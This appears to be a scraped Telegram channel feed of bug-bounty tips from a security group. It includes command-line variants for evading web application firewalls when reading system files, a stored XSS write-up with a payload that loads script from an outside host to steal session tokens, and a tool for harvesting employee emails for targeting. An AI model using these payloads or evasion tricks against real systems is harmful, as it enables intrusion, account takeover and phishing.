Brut Security
14.9K subscribers
953 photos
76 videos
290 files
997 links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: [email protected]
Download Telegram
This is really cool πŸ”₯

An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.

https://github.com/jthack/ffufai?tab=readme-ov-file

#bugbountytips #bugbounty #cybersecurity
πŸ‘13πŸ”₯2
⚑Bypass Series for bug hunters😎

Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF

rev /etc/hosts | rev
od -An -c /etc/hosts | tr -d ' '
cat $HOME/../../etc/hosts
cat ${PWD}/../../../etc/hosts
grep "" /etc/hosts
cut -c1- /etc/hosts
paste /etc/hosts

Guys, what do you think about those WAF bypass techniques I created?
Hold on for the last one β€” it's really awesome!😎

😁Follow meπŸ‘‰πŸΌ DarkShadow

#Bugbountytips #series@brutsecurity
πŸ”₯9❀7πŸ‘5
⚑Bash Series for bug hunters😎

Part-2


Create multiple folders using one-liner:

mkdir {dev,test,prod}

This command will create 3 directories (dev, test, prod) at a time.


Creating Multiple Files Efficiently:

touch {file1,file2,file3}.txt

File creates like file1.txt, file2.txt file3.txt


Generating Files with Numeric Sequences:

seq -w 1 10 | xargs -I {} touch file{}.txt

This sequence creates file's:
file01.txt, file02.txt, file03.txt .... To file10.txt


Boost your bug hunting with pro Bash commands β€” a must for every hacker!
Don't forget to reactπŸ”₯


😁Follow meπŸ‘‰πŸΌ DarkShadow

#Bugbountytips #series@brutsecurity
πŸ”₯13πŸ‘4
program-list.json
1.1 MB
πŸŒ€Helpful Websites for Finding Bug Bounty and Vulnerability Disclosure Programs.⚑

Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.

https://disclose.io/programs/

You can also download all programs in JSON format, provided the JSON file.

Don't forget to react πŸ”₯
😁 Follow me πŸ‘‰πŸΌ
DarkShadow

#BugBountytips
πŸ”₯22πŸ‘3🀝2
⚑Popular HackerOne target Agoda.com was vulnerable to Stored XSS β€” Rewarded $3,200😬

πŸŒ€Core Issue:

By adding a new property (Apartment/Flat) and injecting a malicious script, the backend failed to properly sanitize user input. Validation was only enforced on the frontend.

πŸŒ€Affected Functionality:
Property listing creation, including:
 ‒ Property Name
 ‒ Property Description
 ‒ Company Name
 ‒ Company Address

πŸ’₯Injection Payload:
"><script src=https://hackbx.bxss.in></script>

This single payload can be used to execute thousands of XSS scripts.


πŸ”₯Impact:
On page load, the stored XSS steals the user’s JWT token from cookies, enabling full account takeover with zero user interaction.

😁 Follow meπŸ‘‰πŸΌ DarkShadow
#BugBountytips
πŸ—Ώ12❀4πŸ”₯4πŸ‘1πŸ‘¨β€πŸ’»1
What do you think about these kinds of proof-of-concepts and bug bounty tips?
Drop your thoughts in the comments β€” I’d love to hear your feedback and what you'd like to see next!😁❀️
❀24πŸ‘11
We enabled copyright protection because many people keeps copying our posts and sharing them on their X accounts, Telegram channels, and groups without any effort. The most frustrating part is that they don’t even mention or credit us after copying our content.
πŸ‘25❀13😒4
Brut Security pinned Β«We enabled copyright protection because many people keeps copying our posts and sharing them on their X accounts, Telegram channels, and groups without any effort. The most frustrating part is that they don’t even mention or credit us after copying our content.Β»
⚑Bypass Series for bug hunters😎

Part-5 (last part)
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF

tar cf - /etc/hosts | tar xf - -O
gzip -c /etc/hosts | gzip -d
less /e*c/h*st*
more /e{t,c}*/{o,h}*s*{s,t}
strings /??c/??sts
sort /etc/hosts | uniq

guys, these are some custom payloads I personally crafted β€” highly effective at bypassing firewalls and evading detection.

For more follow meπŸ‘‰πŸΌ DarkShadow


#Bugbountytips #series@brutsecurity
πŸ”₯13🀝3πŸ‘2πŸ‘¨β€πŸ’»2
OSCP Cheat Sheet.pdf
477.7 KB
❀20🫑3πŸ”₯2πŸ‘1🀝1
How many of you received this free Sony Swag?
🐳6πŸ‘2
Only 6 hours... and boom!
Found multiple critical vulnerabilities in
US Bank β€” including:

Leaked sensitive information

Hardcoded auth credentials

Unprotected sensitive endpoints

Unauthenticated access to the dashboard

And more juicy stuff...

ο»Ώ


Why you guys not following me yet?

It's like walking into a digital vault with no lock... just saying.

Ethically hacking to protect, not to exploit.
Does anyone know if they have a bug bounty or responsible disclosure program?
😱23πŸ‘11❀2
πŸ‘»Nuclei AI Prompts is a platform that offers a collection of ready-to-use security prompts for Nuclei. It helps penetration testers and security researchers speed up their work by providing prompts for common vulnerabilities like XSS, SQLi, RCE, and more. You can easily copy these prompts and use them in your security testing, and even contribute new ones to help grow the community.

βœ…Join Telegram - t.iss.one/brutsecurity
πŸ”₯nucleiprompts.com

#cybersecurity #bugbounty #bugbountytips #nuclei
πŸ‘5πŸ”₯5❀1🀝1
Discovering a Business Logic Flow Bug (Low-Hanging Fruit)

Try my this simple method to identify a common business logic flaw:

But wait β€” before you continue...
If you're not following me yet, what are you doing?


πŸ§ͺ Exploitation Steps:

1. Register a new account and take note of the username you used.
2. Verify and activate the account.
3. Delete the account.
4. Now, try registering again using the same username β€” observe what happens.


If the server still blocks or reserves the username after the account is deleted, congratulations! You've just uncovered a Business Logic Flow bug😁

#BugBountytips
πŸ‘16😁3πŸ”₯2🫑2πŸ‘¨β€πŸ’»1πŸ—Ώ1
collect emails, usernames from commit history of repos of an org from GitHub for more personalized targeting of employees

ghintel.secrets.ninja
❀20πŸ‘4πŸ”₯1😒1
Duplicate πŸ₯²
😒28🫑3πŸ‘1
Account Takeover via Email βš”οΈ

#infosec #cybersec #bugbountytips
πŸ”₯17πŸ‘3❀2πŸ‘2